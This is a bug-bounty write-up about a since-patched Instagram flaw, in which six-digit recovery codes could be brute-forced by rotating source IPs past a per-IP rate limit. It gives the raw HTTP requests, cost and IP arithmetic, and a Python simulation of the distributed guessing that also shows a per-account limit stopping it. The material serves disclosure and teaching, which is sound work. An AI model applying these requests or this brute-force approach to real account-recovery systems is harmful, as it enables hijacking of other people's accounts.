How I Could Have Hacked Any Instagram Account | Earned $30,000

This article is about a vulnerability in Instagram's password reset flow that would have let an attacker take over any Instagram account without the owner's permission. Facebook and Instagram fixed the problem and paid a $30,000 bounty for the report.

Facebook is constantly trying to make its apps safer. It recently increased bounty payouts for high-impact bugs such as account takeover, so I decided to see whether I could find one in Instagram.

First, I looked at the password reset flow on the Instagram website, but I couldn't find any bugs there. Then I tried the mobile app and found a way to abuse it. When you enter your phone number, Instagram sends a six-digit code to that number to reset the password. If you can try lots of codes quickly enough, you can guess the code for any account. I expected a limit on how many times you could try, and when I tested it there was a limit, but I also found a way around it.

I found that the limit was applied per source IP address: by spreading the requests across many machines and changing the source IP often, I could try as many codes as I wanted without being blocked. I reported the problem to Facebook, but at first they could not reproduce it. I had to explain it in more detail and show them exactly how it worked.

Proof of Concept:

Request (triggers the recovery code to be sent to the victim's phone; `mobile_number` and `device_id` are placeholders for the victim's phone number and the attacker's Android device ID):

POST /api/v1/users/lookup/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27/8.1.0; 440dpi; 1080x2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

q=mobile_number&device_id=android-device-id-here

The victim receives a six-digit passcode that expires after 10 minutes.

Verify Passcode (the endpoint that gets brute-forced; `recover_code` is the guess, `device_id` the same placeholder as above):

POST /api/v1/accounts/account_recovery_code_verify/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27/8.1.0; 440dpi; 1080x2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

recover_code=123456&device_id=android-device-id-here

Now we need to brute-force this endpoint from multiple IPs. Roughly, I was able to send 200 requests from a single IP before hitting the rate limit. In my tests I used 1000 different machines and IPs (which also makes the concurrency easy) to send 200k requests, that is, 20 percent of the one million possible six-digit codes.

In a real attack scenario, covering all one million codes at 200 requests per IP means the attacker needs 5000 IPs to hack an account. That sounds like a lot, but it is actually easy with a cloud provider such as Amazon or Google. Performing the complete attack over all one million codes would cost around 150 dollars. Note that the whole run has to finish inside the code's 10-minute lifetime, which is why concurrency across many machines matters as much as the IP count.
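To make the arithmetic and the failure modes concrete, here is an added simulation of the attack against a mock of the verification endpoint. It is example code written for this article, not Instagram's code or the researcher's tooling; the endpoint behaviour (a per-IP counter only, 200 requests before blocking, a six-digit code that expires after 10 minutes) is modelled from the numbers in the text, and the `per_account_limit` option is an assumed hardening, not a description of what Facebook actually deployed. It shows that 5000 IPs times 200 guesses cover the code space, that a run slower than the expiry window fails part-way, and that a per-account attempt limit stops the attack regardless of how many IPs are used.

```python
"""Simulation of a per-IP rate-limit bypass against a 6-digit recovery code.

Added example: mock service and attacker, not Instagram's implementation.
"""
import secrets
from collections import defaultdict

CODE_SPACE = 1_000_000       # six-digit recovery codes 000000..999999
PER_IP_LIMIT = 200           # requests one IP can make before being blocked (figure from the article)
CODE_TTL_SECONDS = 600       # the code expires after 10 minutes


class RecoveryService:
    """Mock of the verify endpoint. Default: per-IP limiting only (the vulnerable design).

    per_account_limit (assumed hardening): maximum failed guesses per account per code.
    """

    def __init__(self, per_account_limit=None):
        self.codes = {}                        # account -> (code, issued_at)
        self.ip_hits = defaultdict(int)        # ip -> verify requests seen
        self.account_fails = defaultdict(int)  # account -> failed guesses (hardened mode only)
        self.per_account_limit = per_account_limit

    def request_code(self, account, now):
        code = f"{secrets.randbelow(CODE_SPACE):06d}"
        self.codes[account] = (code, now)
        # In reality the code goes to the victim's phone; it is returned here only for the demo.
        return code

    def verify(self, account, guess, ip, now):
        """Returns 'ok', 'wrong', 'rate_limited', 'locked' or 'expired'."""
        code, issued_at = self.codes[account]
        if now - issued_at > CODE_TTL_SECONDS:
            return "expired"
        if self.per_account_limit is not None and self.account_fails[account] >= self.per_account_limit:
            return "locked"          # per-account limit: IP rotation does not help
        self.ip_hits[ip] += 1
        if self.ip_hits[ip] > PER_IP_LIMIT:
            return "rate_limited"    # per-IP limit: bypassed by using another IP
        if guess == code:
            return "ok"
        self.account_fails[account] += 1
        return "wrong"


def ips_needed(code_space=CODE_SPACE, per_ip_limit=PER_IP_LIMIT):
    """Distinct source IPs needed to cover the whole code space under the per-IP limit."""
    return -(-code_space // per_ip_limit)  # ceiling division: 1_000_000 / 200 = 5000


def distributed_bruteforce(service, account, ip_pool, now, rate_per_second):
    """Give each IP a slice of PER_IP_LIMIT consecutive codes. Returns (found_code, attempts).

    rate_per_second is the aggregate guess rate of the whole pool; it drives the simulated
    clock so the code's expiry can be observed when the run is too slow.
    """
    attempts = 0
    for i, ip in enumerate(ip_pool):
        start = i * PER_IP_LIMIT
        for n in range(start, min(start + PER_IP_LIMIT, CODE_SPACE)):
            attempts += 1
            t = now + attempts / rate_per_second
            outcome = service.verify(account, f"{n:06d}", ip, t)
            if outcome == "ok":
                return f"{n:06d}", attempts
            if outcome in ("rate_limited", "locked", "expired"):
                return None, attempts
    return None, attempts


if __name__ == "__main__":
    pool = [f"ip-{i}" for i in range(ips_needed())]   # constructed pool of 5000 source IPs
    for label, svc, rate in (("vulnerable, fast", RecoveryService(), 2000),
                             ("vulnerable, too slow", RecoveryService(), 1000),
                             ("per-account limit", RecoveryService(per_account_limit=10), 2000)):
        code = svc.request_code("victim", now=0.0)
        found, attempts = distributed_bruteforce(svc, "victim", pool, 0.0, rate)
        print(f"{label}: code={code} found={found} attempts={attempts}")
```

At 2000 guesses per second the full million takes 500 seconds and always finishes before the code expires; at 1000 per second only the first 600,000 codes can be tried, so the attack succeeds only if the code happens to fall in that range. The per-account counter ends the run after a handful of wrong guesses no matter how many IPs are behind it, which is the property the per-IP limiter alone was missing.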

The Facebook security team was convinced after being shown a video of 200k requests being sent, and they were quick to address and fix the issue.

After the Patch

This bug was found in July 2019, and the Facebook security team has since fixed it.

Special thanks to Laxman Muthiyah, whose original writeup this article is based on.
